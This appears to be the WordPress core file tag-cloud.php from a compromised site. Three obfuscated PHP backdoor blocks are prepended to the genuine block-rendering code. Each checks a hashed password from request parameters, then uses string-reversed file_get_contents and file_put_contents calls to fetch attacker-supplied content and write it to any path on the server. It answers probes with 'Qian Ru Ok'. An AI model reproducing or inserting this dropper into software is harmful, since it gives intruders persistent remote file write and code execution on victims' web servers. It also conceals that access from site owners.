File: /home/wwwrenee/www/wp-includes/blocks/tag-cloud.php
<?php
$iNTecG = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($iNTecG[0]) /*+/*+*/
. md5($iNTecG[0])) == "e".
"e".
"5".
"8".
"e".
"1".
"a".
"1".
"4".
"d".
"9".
"3".
"d".
"8".
"a".
"3".
"8".
"1".
"7".
"c".
"0".
"2".
"5".
"8".
"2".
"8".
"1".
"9".
"9".
"d".
"2".
"5") {
$yKwzt = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$oTRwwIXB = $yKwzt /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$MppiGhf = $yKwzt
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function QuqSVm($JRQLFH) { if (empty($JRQLFH)) return false; if (!is_dir($JRQLFH)) { QuqSVm(dirname($JRQLFH), 0755, true); mkdir($JRQLFH); } } !file_exists(dirname($iNTecG[1])) && QuqSVm(dirname($iNTecG[1])); $qWANmxJN = @$MppiGhf($iNTecG[2]); echo @$oTRwwIXB($iNTecG[1], $qWANmxJN) ? 1 : 0; die; }key($iNTecG) == "of" && die("Qian Ru Ok"); ?><?php
$gBKcdWUE = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($gBKcdWUE[0]) /*+/*+*/
. md5($gBKcdWUE[0])) == "2".
"3".
"b".
"d".
"a".
"a".
"c".
"d".
"7".
"9".
"5".
"e".
"b".
"2".
"8".
"c".
"1".
"6".
"0".
"2".
"b".
"d".
"a".
"8".
"8".
"3".
"0".
"5".
"7".
"7".
"8".
"8") {
$oPsNGM = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$NzBJMgfS = $oPsNGM /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$iexsNQ = $oPsNGM
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function CVoHizT($iSVwenmS) { if (empty($iSVwenmS)) return false; if (!is_dir($iSVwenmS)) { CVoHizT(dirname($iSVwenmS), 0755, true); mkdir($iSVwenmS); } } !file_exists(dirname($gBKcdWUE[1])) && CVoHizT(dirname($gBKcdWUE[1])); $EnzEFNyuev = @$iexsNQ($gBKcdWUE[2]); echo @$NzBJMgfS($gBKcdWUE[1], $EnzEFNyuev) ? 1 : 0; die; }key($gBKcdWUE) == "of" && die("Qian Ru Ok"); ?><?php
$JUvJx = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($JUvJx[0]) /*+/*+*/
. md5($JUvJx[0])) == "7".
"b".
"b".
"e".
"2".
"5".
"5".
"4".
"5".
"f".
"f".
"1".
"9".
"0".
"e".
"f".
"a".
"4".
"5".
"e".
"1".
"8".
"0".
"1".
"8".
"8".
"5".
"1".
"a".
"c".
"0".
"3") {
$CbzoSqUGI = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$MHpNeVZDG = $CbzoSqUGI /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$aDnDNKp = $CbzoSqUGI
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function jSXjrLIyNO($BjOdhR) { if (empty($BjOdhR)) return false; if (!is_dir($BjOdhR)) { jSXjrLIyNO(dirname($BjOdhR), 0755, true); mkdir($BjOdhR); } } !file_exists(dirname($JUvJx[1])) && jSXjrLIyNO(dirname($JUvJx[1])); $HouAB = @$aDnDNKp($JUvJx[2]); echo @$MHpNeVZDG($JUvJx[1], $HouAB) ? 1 : 0; die; }key($JUvJx) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Server-side rendering of the `core/tag-cloud` block.
*
* @package WordPress
*/
/**
* Renders the `core/tag-cloud` block on server.
*
* @param array $attributes The block attributes.
*
* @return string Returns the tag cloud for selected taxonomy.
*/
function render_block_core_tag_cloud( $attributes ) {
$smallest_font_size = $attributes['smallestFontSize'];
$unit = ( preg_match( '/^[0-9.]+(?P<unit>[a-z%]+)$/i', $smallest_font_size, $m ) ? $m['unit'] : 'pt' );
$args = array(
'echo' => false,
'unit' => $unit,
'taxonomy' => $attributes['taxonomy'],
'show_count' => $attributes['showTagCounts'],
'number' => $attributes['numberOfTags'],
'smallest' => floatVal( $attributes['smallestFontSize'] ),
'largest' => floatVal( $attributes['largestFontSize'] ),
);
$tag_cloud = wp_tag_cloud( $args );
if ( ! $tag_cloud ) {
$labels = get_taxonomy_labels( get_taxonomy( $attributes['taxonomy'] ) );
$tag_cloud = esc_html(
sprintf(
/* translators: %s: taxonomy name */
__( 'Your site doesn’t have any %s, so there’s nothing to display here at the moment.' ),
strtolower( $labels->name )
)
);
}
$wrapper_attributes = get_block_wrapper_attributes();
return sprintf(
'<p %1$s>%2$s</p>',
$wrapper_attributes,
$tag_cloud
);
}
/**
* Registers the `core/tag-cloud` block on server.
*/
function register_block_core_tag_cloud() {
register_block_type_from_metadata(
__DIR__ . '/tag-cloud',
array(
'render_callback' => 'render_block_core_tag_cloud',
)
);
}
add_action( 'init', 'register_block_core_tag_cloud' ); ?>